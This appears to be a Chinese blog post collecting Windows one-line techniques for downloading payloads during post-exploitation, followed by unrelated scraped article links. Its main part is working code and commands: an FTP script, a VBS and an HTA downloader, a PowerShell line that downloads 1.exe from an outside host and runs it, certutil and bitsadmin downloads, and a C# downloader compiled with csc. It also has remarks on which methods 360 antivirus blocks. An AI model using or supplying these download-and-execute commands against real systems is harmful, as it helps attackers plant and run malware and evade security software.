利用ftp来下载payload文件

echo open 192.168.1.1 21> ftp.txt

echo ftp>> ftp.txt

echo bin >> ftp.txt

echo ftp>> ftp.txt

echo GET 1.exe >> ftp.txt

ftp -s:ftp.txt

后记:这个我没有实验成功太菜了

利用vbs来下载payload

Set Post = CreateObject("Msxml2.XMLHTTP")

Set Shell = CreateObject("Wscript.Shell")

Post.Open "GET","http://192.168.1.1/1.exe",0

Post.Send()

Set aGet = CreateObject("ADODB.Stream")

aGet.Mode = 3

aGet.Type = 1

aGet.Open()

aGet.Write(Post.responseBody)

aGet.SaveToFile "C:\test\1.exe",2

后记:这个已经利用成功了,网上说可以用script来执行,可能win10上面没有,但是可以直接双击运行,或者命令行里面直接使用,vbs脚本后缀为vbs

利用Powershell来下载payload

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'

后记:是在命令行中执行以上命令

利用certutil下载文件

直接下载certutil.exe -urlcache -split -f http://192.168.1.1/1.exe

指定文件名保存certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php

删除缓存certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
查看缓存certutil.exe -urlcache *

至于这个缓存有什么用就不知道了
后记:下载的文件就在当前目录并且文件名与url相同(除非指定文件名保存),360会拦截

利用CSC(windows的c#编译器)来下载文件

1.cs文件内容

using System.Net;

namespace downloader

{

    class Program

    {

        static void Main(string[] args)

        {

            WebClient client = new WebClient();

            string URLAddress = @"http://192.168.1.1/1.exe";

            string receivePath = @"C:\test\";

            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName

        (URLAddress));

        }

    }

}

后记:csc.exe位于C:\Windows\Microsoft.NET\Framework\v2.0.50727。因为未加入环境变量中所以需要指定路径。
使用方式:C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\download.exe C:\test\1.cs
这样1.cs就会被编辑为exe文件,我们运行一下就会把文件下载下来了,360会进行拦截,估计是捕获了下载的时候的流量了,因为并不是直接就拦截了

hta下载文件

将下列代码保存至.hta文件

<html>

<head>

<script>

var Object = new ActiveXObject("MSXML2.XMLHTTP");

Object.open("GET","http://192.168.1.1/1.exe",false);

Object.send();

if (Object.Status == 200)

{

    var Stream = new ActiveXObject("ADODB.Stream");

    Stream.Open();

    Stream.Type = 1;

    Stream.Write(Object.ResponseBody);

    Stream.SaveToFile("C:\\test\\1.exe", 2);

    Stream.Close();

}

window.close();

</script>

<HTA:APPLICATION

WINDOWSTATE = "minimize">

</head>

<body>

</body>

</html>

后记:直接双击运行既可或者命令行直接执行,360会拦截

利用bitsadmin下载文件

bitsadmin是一个控制台工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe

后记:不支持https/ftp协议,php/python自带的服务器会报错,360会拦截

总结,其实感觉Windows上可以玩的东西比Linux多,使用的也比Linux多,这可能也是红蓝对抗偏向于这边的原因吧

一句话下载总结(用于后渗透上传payload)的更多相关文章

  1. android 拍照或者图库选择 压缩后 图片 上传

    通过拍照或者从相册里选择图片通过压缩并上传时很多应用的常用功能,记录一下实现过程 一:创建个临时文件夹用于保存压缩后需要上传的图片 /** * path:存放图片目录路径 */ private Str ...

  2. tomcat重启或关闭后,上传文件消失 .

    tomcat重启或关闭后,上传文件消失的问题,是因为在断电前myeclipse是启动的,断电时造成myeclipse异常关闭,再重新启动myeclipse时会重新发布项目,把先前发布的项目给覆盖了,所 ...

  3. 程序windows上可以上传附件,部署到 linux服务器后出现 “上传目录 不可写” 怎么解决?

    这样的问题一般都是linux  下文件读写权限引起的,用 shell  命名到上传附件的目录(如 cd /data/www/project/upload/),然后执行 shell 文件权限设置: 例如 ...

  4. JIRA恢复备份后无法上传附件

    1.在恢复JIRA 备份数据和附件后,上传附件失败,这一般是恢复附件时没有修改附件的拥有者和组 创建JIRA平台,会自动创建一个服务器的账户,如果是服务器第一次部署JIRA那么账户肯定是jira,如果 ...

  5. 加固后,上传play store, 在 google play store 下载应用安装后,打开签名校验失败

    在Google Play Console. (Google Play App Signing )签署您的应用 在创建应用时: 会有个“ Google Play App Signing” 的东西,提示使 ...

  6. 使用springMVC实现文件上传和下载之环境配置与上传

    最近的项目中用到了文件的上传和下载功能,任务分配给了其他的同时完成.如今项目结束告一段落,我觉着这个功能比较重要,因此特意把它提取出来自己进行了尝试. 一. 基础配置: maven导包及配置pom.x ...

  7. 用SpringMVC实现的上传下载方式二(多文件上传)

    参考来源:      http://blog.csdn.net/qq_32953079/article/details/52290208 1.导入相关jar包 commons-fileupload.j ...

  8. SecureCRT上传、下载文件 使用rz【上传】& sz【下载】命令

    首先安装:apt-get install lrzsz SecureCRT这款SSH客户端软件同时具备了终端仿真器和文件传输功能.比ftp命令方便多了,而且服务器不用再开FTP服务了.rz,sz是便是L ...

  9. 视频(其他)下载+tomcat 配置编码+图片上传限制大小

    视频下载:前台 jsp function downVideo(value,row,index){ return '<a href="<%=basePath%>admin/v ...

随机推荐

  1. Java中使用try-catch-finally处理IO流中的异常

    我们使用try-catch-finally来接收IO流的异常 finally是最后执行的步骤,非常适合最后存放close来关闭IO流,而且编程中我们不可以随意抛出异常,必须对异常进行处理. 从try- ...

  2. PHP FILTER_VALIDATE_URL 过滤器

    定义和用法 FILTER_VALIDATE_URL 过滤器把值作为 URL 来验证. Name: "validate_url" ID-number: 273 可能的标志: FILT ...

  3. Android中TextView不获取焦点可以实现跑马灯的效果

    之前在网上找了很多关于TextView的跑马灯效果实现的例子,实现起来都存在一些问题,例如一种是完全重画一个跑马灯,还有就是只设置TextView的相关属性使其具有跑马灯的效果,总的来说这两种方法都是 ...

  4. 思维+贪心——cf1042D

    /* 首先考虑从后往前计算lis,显然0的在很多情况下的贡献要大于1 如果遇上0,那么lis++,如果遇上1,那么cnt1++,并且用cnt1更新lis 这样的贪心保证正确,因为从[i,j]这一段的l ...

  5. 工程师技术(一):启用SELinux保护、自定义用户环境、配置IPv6地址、配置聚合连接、配置firewalld防火墙

    一.启用SELinux保护 目标: 本例要求为虚拟机 server0.desktop0 配置SELinux: 确保 SELinux 处于强制启用模式 在每次重新开机后,此设置必须仍然有效 方案: SE ...

  6. Delphi 2010 XE 中使用 JSON 之 SuperObject68-6

    JSON之SuperObject(1):一直盼着Delphi能够直接支持"正则:Delphi2009刚来的时候,有了JSON,但:Delphi2010带了两个相关单元:DBXJS:我想不等了 ...

  7. python:列表、元组和字典

    1.1.特点:   任意对象的有序集合   通过偏移量读取   可变长度,异构以及任意嵌套   属于可变序列的分类   对象引用数组:当把一个对象赋给一个数据结构元素或变量名时,python总会存储对 ...

  8. 【Shiro】一、Apache Shiro简介

    一.Apache Shiro简介 1.简介 一个安全性框架 特点:功能丰富.使用简单.运行独立 核心功能: Authentication(认证):你是谁? Authorization(授权):谁能干什 ...

  9. A. Srdce and Triangle--“今日头条杯”首届湖北省大学程序设计竞赛(网络同步赛)

    如下图这是“今日头条杯”首届湖北省大学程序设计竞赛的第一题,作为赛后补题 题目描述:链接点此 这套题的github地址(里面包含了数据,题解,现场排名):点此 Let  be a regualr tr ...

  10. 批处理禁止指定的IE的加载项

    步骤: 1.查找插件对应的 CLSID 获取 HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats 下的 CLSID, 然后在 HKCR\C ...